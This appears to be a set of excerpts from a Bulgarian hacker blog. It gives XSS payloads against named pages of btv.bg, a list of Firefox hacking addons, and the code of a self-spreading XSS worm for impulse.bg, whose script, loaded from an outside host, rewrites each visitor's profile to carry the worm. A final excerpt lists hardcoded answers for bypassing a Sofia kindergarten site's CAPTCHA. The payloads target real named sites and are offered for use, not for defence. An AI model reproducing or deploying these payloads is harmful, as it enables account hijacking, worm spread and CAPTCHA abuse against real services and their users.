new btv.bg multiple xss issues

new year, new site, new…xsses
http://www.btv.bg/horoscope/daily_horoscope.pcgi?sign_id=
“][/img][/h3][script]alert(‘nigonized’)[/script]<!—
search box xss vuln:
“][script]alert(‘nigonized’)[/script]<!—
to be continued….

ff’s grand sixteen

HackBar [ https://addons.mozilla.org/en-US/firefox/addon/3899 ]
FireBug [ https://addons.mozilla.org/en-US/firefox/addon/1843 ]
Anonymouser [ https://addons.mozilla.org/en-US/firefox/addon/1415 ]
Whois [ https://addons.mozilla.org/en-US/firefox/addon/603 ]
Web Developer [ https://addons.mozilla.org/en-US/firefox/addon/60 ]
SwitchProxy Tool [https://addons.mozilla.org/en-US/firefox/addon/125]
Foxy Proxy [ https://addons.mozilla.org/en-US/firefox/addon/2464 ]
Reload Every [https://addons.mozilla.org/en-US/firefox/addon/115]
User Agent Switcher [ https://addons.mozilla.org/en-US/firefox/addon/59 ]
View Cookies [ https://addons.mozilla.org/en-US/firefox/addon/3587 ]
Modify Headers [ https://addons.mozilla.org/en-US/firefox/addon/967 ]
TiX Now! [https://addons.mozilla.org/en-US/firefox/addon/3601]
Wmlbrowser [ https://addons.mozilla.org/en-US/firefox/addon/62 ]
XSSMe [http://www.securitycompass.com/exploit_me/xssme/xssme-0.2.1.xpi]
SQL [...]

worming impulse.bg

impulse.bg позволява използването на HTML в “title”, точно както прави myspace.com с малката разлика, че няма забрани.
Веднага прави впечатление, това:
GET /js/scriptaculous/scriptaculous.js
което само по себе си прави нашето занимание по-лесно и красиво. Поставяйки в “Заглавие” полето нещо от рода на:
{script src=”www.mysite.com/impulse.js”}{/script}

impulse.js contents:

var params = “name=wormy!&email=nigon.hacked.in%40gmail.com&country=1&city_id=5&
city=&birthday=11&birthmonth=8&birthyear=1980&gender=1&
search_gender=2&height=0&weight=0&eyes=0&hair=0&
occupation=0&smoke=1&alchohol=1&title=%3Cscript%20src
%3D%22http%3A%2F%2Fmysite.com/impulse.js%22%3E%3C%2Fscript%3E&
info=&msg_report=1&comment_report=1&
Submit=%D0%9F%D1%80%D0%BE%D0%BC%D0%B5%D0%BD%D0%B8″;
var MyAjax = new Ajax.Request (‘/myinfo’, {
method: ‘post’,
parameters: params
});
резултат:
при всяко посещение [...]

деца…градини…глупост…фалш

демагогията е на ход…
след като се случи това:
http://news.ibox.bg/news/id_2042186633
се въведе CAPTCHA(“CAPCTHA”) в същия…да, ама не…
http://kg.sofia.bg/i/captcha/1-100.GIF
глупост след глупост…какво става след като се опишат всички .гиф-чета(1-100…20 минути) в един масив? Не знам…не разбирам…
$captchas = array(
“T490″,”25T4″,”441T”,”4984″,”5500″,”5561″,
“8597″,”5T24″,”1864″,”2514″,”T154″,”2556″,
“4612″,”3296″,”64T0″,”5354″,”6000″,”458T”,
“1190″,”916T”,”6082″,”5819″,”4102″,”3169″,
“419T”,”1014″,”1355″,”8566″,”8829″,”5045″,
“5580″,”6268″,”16T3″,”4047″,”3315″,”3445″,
“T3T6″,”4380″,”8389″,”4404″,”235T”,”4808″,
“1005″,”9509″,”T592″,”5341″,”64TT”,”T316″,
“6159″,”2127″,”T965″,”T223″,”5522″,”6333″,
“5832″,”3122″,”3916″,”T839″,”8695″,”5433″,
“3T96″,”8483″,”8540″,”9900″,”2847″,”T005″,
“4844″,”6220″,”8150″,”616T”,”TT30″,”31TT”,
“3684″,”9502″,”2T96″,”T965″,”9281″,”9989″,
“1026″,”9026″,”5668″,”3911″,”40T5″,”4624″,
“TT64″,”6039″,”T985″,”802T”,”1294″,”240T”,
“14TT”,”TT14″,”21T3″,”998T”,”2412″,”8132″,
“4835″,”890T”,”2163″,”5291″);